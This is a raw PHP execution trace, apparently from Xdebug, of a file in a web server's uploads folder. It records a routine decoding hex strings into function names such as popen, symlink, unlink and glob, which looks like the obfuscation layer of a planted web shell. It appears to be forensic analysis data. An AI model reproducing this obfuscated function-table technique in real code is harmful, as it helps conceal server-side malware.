3	1380	1	0.052236	722360
3	1380	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1381	0	0.052266	722360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1381	1	0.052278	722408
3	1381	R			116
3	1382	0	0.052291	722328	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1382	1	0.052302	722368
3	1382	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1383	0	0.052332	722360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1383	1	0.052344	722408
3	1383	R			101
3	1384	0	0.052356	722328	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1384	1	0.052367	722368
3	1384	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1385	0	0.052397	722360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1385	1	0.052408	722408
3	1385	R			103
3	1386	0	0.052421	722328	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1386	1	0.052433	722368
3	1386	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1387	0	0.052462	722360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1387	1	0.052473	722408
3	1387	R			105
3	1388	0	0.052486	722328	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1388	1	0.052497	722368
3	1388	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1389	0	0.052526	722360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1389	1	0.052537	722408
3	1389	R			100
3	1390	0	0.052550	722328	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1390	1	0.052561	722368
3	1390	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1364	1	0.052591	722328
2	1364	R			'posix_getegid'
1		A						/var/www/html/uploads/lCT.php	7	$func[68] = 'posix_getegid'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1391	0	0.052626	722328	dehex	1		/var/www/html/uploads/lCT.php	7	1	'616464736c6173686573'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 19
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1392	0	0.052666	722360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1392	1	0.052679	722408
3	1392	R			97
3	1393	0	0.052691	722328	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1393	1	0.052702	722368
3	1393	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1394	0	0.052733	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1394	1	0.052744	722440
3	1394	R			100
3	1395	0	0.052757	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1395	1	0.052768	722400
3	1395	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1396	0	0.052798	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1396	1	0.052809	722440
3	1396	R			100
3	1397	0	0.052822	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1397	1	0.052836	722400
3	1397	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1398	0	0.052866	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1398	1	0.052877	722440
3	1398	R			115
3	1399	0	0.052890	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1399	1	0.052901	722400
3	1399	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1400	0	0.052931	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1400	1	0.052943	722440
3	1400	R			108
3	1401	0	0.052955	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1401	1	0.052966	722400
3	1401	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1402	0	0.052996	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1402	1	0.053008	722440
3	1402	R			97
3	1403	0	0.053021	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1403	1	0.053032	722400
3	1403	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1404	0	0.053062	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1404	1	0.053073	722440
3	1404	R			115
3	1405	0	0.053085	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1405	1	0.053096	722400
3	1405	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1406	0	0.053128	722392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	1406	1	0.053139	722440
3	1406	R			104
3	1407	0	0.053173	722360	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	1407	1	0.053185	722400
3	1407	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1408	0	0.053236	722400	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1408	1	0.053248	722448
3	1408	R			101
3	1409	0	0.053261	722368	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1409	1	0.053272	722408
3	1409	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1410	0	0.053303	722400	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1410	1	0.053314	722448
3	1410	R			115
3	1411	0	0.053326	722368	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1411	1	0.053338	722408
3	1411	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1391	1	0.053368	722368
2	1391	R			'addslashes'
1		A						/var/www/html/uploads/lCT.php	7	$func[69] = 'addslashes'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1412	0	0.053403	722368	dehex	1		/var/www/html/uploads/lCT.php	7	1	'73796d6c696e6b'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1413	0	0.053443	722400	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1413	1	0.053455	722448
3	1413	R			115
3	1414	0	0.053468	722368	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1414	1	0.053478	722408
3	1414	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1415	0	0.053509	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	1415	1	0.053520	722480
3	1415	R			121
3	1416	0	0.053532	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	1416	1	0.053544	722440
3	1416	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1417	0	0.053574	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1417	1	0.053591	722480
3	1417	R			109
3	1418	0	0.053604	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1418	1	0.053615	722440
3	1418	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1419	0	0.053645	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1419	1	0.053656	722480
3	1419	R			108
3	1420	0	0.053669	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1420	1	0.053680	722440
3	1420	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1421	0	0.053712	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1421	1	0.053726	722480
3	1421	R			105
3	1422	0	0.053738	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1422	1	0.053751	722440
3	1422	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1423	0	0.053782	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1423	1	0.053794	722480
3	1423	R			110
3	1424	0	0.053806	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1424	1	0.053818	722440
3	1424	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1425	0	0.053847	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6b'
3	1425	1	0.053858	722480
3	1425	R			107
3	1426	0	0.053871	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	107
3	1426	1	0.053882	722440
3	1426	R			'k'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1412	1	0.053912	722400
2	1412	R			'symlink'
1		A						/var/www/html/uploads/lCT.php	7	$func[70] = 'symlink'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1427	0	0.053950	722400	dehex	1		/var/www/html/uploads/lCT.php	7	1	'726d646972'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1428	0	0.053991	722432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1428	1	0.054002	722480
3	1428	R			114
3	1429	0	0.054015	722400	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1429	1	0.054026	722440
3	1429	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1430	0	0.054057	722464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1430	1	0.054068	722512
3	1430	R			109
3	1431	0	0.054080	722432	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1431	1	0.054092	722472
3	1431	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1432	0	0.054122	722464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1432	1	0.054134	722512
3	1432	R			100
3	1433	0	0.054146	722432	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1433	1	0.054157	722472
3	1433	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1434	0	0.054187	722464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1434	1	0.054198	722512
3	1434	R			105
3	1435	0	0.054211	722432	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1435	1	0.054222	722472
3	1435	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1436	0	0.054252	722464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1436	1	0.054263	722512
3	1436	R			114
3	1437	0	0.054276	722432	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1437	1	0.054287	722472
3	1437	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1427	1	0.054317	722432
2	1427	R			'rmdir'
1		A						/var/www/html/uploads/lCT.php	7	$func[71] = 'rmdir'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1438	0	0.054354	722432	dehex	1		/var/www/html/uploads/lCT.php	7	1	'756e6c696e6b'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1439	0	0.054400	722464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1439	1	0.054412	722512
3	1439	R			117
3	1440	0	0.054425	722432	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1440	1	0.054436	722472
3	1440	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1441	0	0.054466	722496	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1441	1	0.054477	722544
3	1441	R			110
3	1442	0	0.054490	722464	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1442	1	0.054501	722504
3	1442	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1443	0	0.054532	722496	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1443	1	0.054542	722544
3	1443	R			108
3	1444	0	0.054555	722464	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1444	1	0.054566	722504
3	1444	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1445	0	0.054596	722496	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1445	1	0.054608	722544
3	1445	R			105
3	1446	0	0.054620	722464	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1446	1	0.054632	722504
3	1446	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1447	0	0.054661	722496	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1447	1	0.054672	722544
3	1447	R			110
3	1448	0	0.054685	722464	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1448	1	0.054696	722504
3	1448	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1449	0	0.054726	722496	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6b'
3	1449	1	0.054737	722544
3	1449	R			107
3	1450	0	0.054750	722464	chr	0		/var/www/html/uploads/lCT.php	204	1	107
3	1450	1	0.054761	722504
3	1450	R			'k'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1438	1	0.054791	722464
2	1438	R			'unlink'
1		A						/var/www/html/uploads/lCT.php	7	$func[72] = 'unlink'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1451	0	0.054825	722464	dehex	1		/var/www/html/uploads/lCT.php	7	1	'61727261795f6d6170'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1452	0	0.054866	722496	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1452	1	0.054877	722544
3	1452	R			97
3	1453	0	0.054890	722464	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1453	1	0.054901	722504
3	1453	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1454	0	0.054932	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1454	1	0.054943	722576
3	1454	R			114
3	1455	0	0.054956	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1455	1	0.054967	722536
3	1455	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1456	0	0.054998	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1456	1	0.055009	722576
3	1456	R			114
3	1457	0	0.055021	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1457	1	0.055033	722536
3	1457	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1458	0	0.055066	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1458	1	0.055078	722576
3	1458	R			97
3	1459	0	0.055091	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1459	1	0.055102	722536
3	1459	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1460	0	0.055132	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	1460	1	0.055143	722576
3	1460	R			121
3	1461	0	0.055155	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	1461	1	0.055166	722536
3	1461	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1462	0	0.055197	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1462	1	0.055208	722576
3	1462	R			95
3	1463	0	0.055221	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1463	1	0.055231	722536
3	1463	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1464	0	0.055261	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1464	1	0.055273	722576
3	1464	R			109
3	1465	0	0.055285	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1465	1	0.055297	722536
3	1465	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1466	0	0.055327	722528	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1466	1	0.055339	722576
3	1466	R			97
3	1467	0	0.055351	722496	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1467	1	0.055362	722536
3	1467	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1468	0	0.055392	722536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1468	1	0.055404	722584
3	1468	R			112
3	1469	0	0.055416	722504	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1469	1	0.055427	722544
3	1469	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1451	1	0.055457	722504
2	1451	R			'array_map'
1		A						/var/www/html/uploads/lCT.php	7	$func[73] = 'array_map'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1470	0	0.055491	722504	dehex	1		/var/www/html/uploads/lCT.php	7	1	'676c6f62'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1471	0	0.055530	722536	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	1471	1	0.055542	722584
3	1471	R			103
3	1472	0	0.055555	722504	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	1472	1	0.055566	722544
3	1472	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1473	0	0.055596	722568	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1473	1	0.055608	722616
3	1473	R			108
3	1474	0	0.055620	722536	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1474	1	0.055632	722576
3	1474	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1475	0	0.055662	722568	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1475	1	0.055673	722616
3	1475	R			111
3	1476	0	0.055685	722536	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1476	1	0.055697	722576
3	1476	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1477	0	0.055727	722568	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	1477	1	0.055739	722616
3	1477	R			98
3	1478	0	0.055751	722536	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	1478	1	0.055762	722576
3	1478	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1470	1	0.055796	722536
2	1470	R			'glob'
1		A						/var/www/html/uploads/lCT.php	7	$func[74] = 'glob'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1479	0	0.055830	722536	dehex	1		/var/www/html/uploads/lCT.php	7	1	'686561646572'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1480	0	0.055870	722568	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	1480	1	0.055881	722616
3	1480	R			104
3	1481	0	0.055894	722536	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	1481	1	0.055906	722576
3	1481	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1482	0	0.055937	722600	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1482	1	0.055949	722648
3	1482	R			101
3	1483	0	0.055961	722568	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1483	1	0.055973	722608
3	1483	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1484	0	0.056003	722600	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	1484	1	0.056015	722648
3	1484	R			97
3	1485	0	0.056027	722568	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	1485	1	0.056038	722608
3	1485	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1486	0	0.056069	722600	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1486	1	0.056081	722648
3	1486	R			100
3	1487	0	0.056093	722568	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1487	1	0.056105	722608
3	1487	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1488	0	0.056135	722600	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1488	1	0.056146	722648
3	1488	R			101
3	1489	0	0.056159	722568	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1489	1	0.056170	722608
3	1489	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1490	0	0.056200	722600	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1490	1	0.056212	722648
3	1490	R			114
3	1491	0	0.056224	722568	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1491	1	0.056236	722608
3	1491	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1479	1	0.056266	722568
2	1479	R			'header'
1		A						/var/www/html/uploads/lCT.php	7	$func[75] = 'header'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1492	0	0.056299	722568	dehex	1		/var/www/html/uploads/lCT.php	7	1	'706f70656e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1493	0	0.056339	722600	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1493	1	0.056350	722648
3	1493	R			112
3	1494	0	0.056362	722568	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1494	1	0.056374	722608
3	1494	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1495	0	0.056405	722632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1495	1	0.056416	722680
3	1495	R			111
3	1496	0	0.056428	722600	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1496	1	0.056440	722640
3	1496	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1497	0	0.056470	722632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1497	1	0.056481	722680
3	1497	R			112
3	1498	0	0.056493	722600	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1498	1	0.056508	722640
3	1498	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1499	0	0.056538	722632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1499	1	0.056549	722680
3	1499	R			101
3	1500	0	0.056562	722600	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1500	1	0.056572	722640
3	1500	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1501	0	0.056603	722632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1501	1	0.056614	722680
3	1501	R			110
3	1502	0	0.056627	722600	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1502	1	0.056638	722640
3	1502	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1492	1	0.056669	722600
2	1492	R			'popen'
1		A						/var/www/html/uploads/lCT.php	7	$func[76] = 'popen'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1503	0	0.056701	722600	dehex	1		/var/www/html/uploads/lCT.php	7	1	'69735f7265736f75726365'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 21
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1504	0	0.056742	722632	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1504	1	0.056753	722680
3	1504	R			105
3	1505	0	0.056766	722600	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1505	1	0.056777	722640
3	1505	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1506	0	0.056808	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1506	1	0.056820	722712
3	1506	R			115
3	1507	0	0.056832	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1507	1	0.056843	722672
3	1507	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1508	0	0.056873	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1508	1	0.056885	722712
3	1508	R			95
3	1509	0	0.056898	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1509	1	0.056909	722672
3	1509	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1510	0	0.056940	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1510	1	0.056951	722712
3	1510	R			114
3	1511	0	0.056964	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1511	1	0.056975	722672
3	1511	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1512	0	0.057006	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1512	1	0.057018	722712
3	1512	R			101
3	1513	0	0.057030	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1513	1	0.057042	722672
3	1513	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1514	0	0.057072	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1514	1	0.057083	722712
3	1514	R			115
3	1515	0	0.057096	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1515	1	0.057107	722672
3	1515	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1516	0	0.057139	722664	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1516	1	0.057152	722712
3	1516	R			111
3	1517	0	0.057176	722632	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1517	1	0.057187	722672
3	1517	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
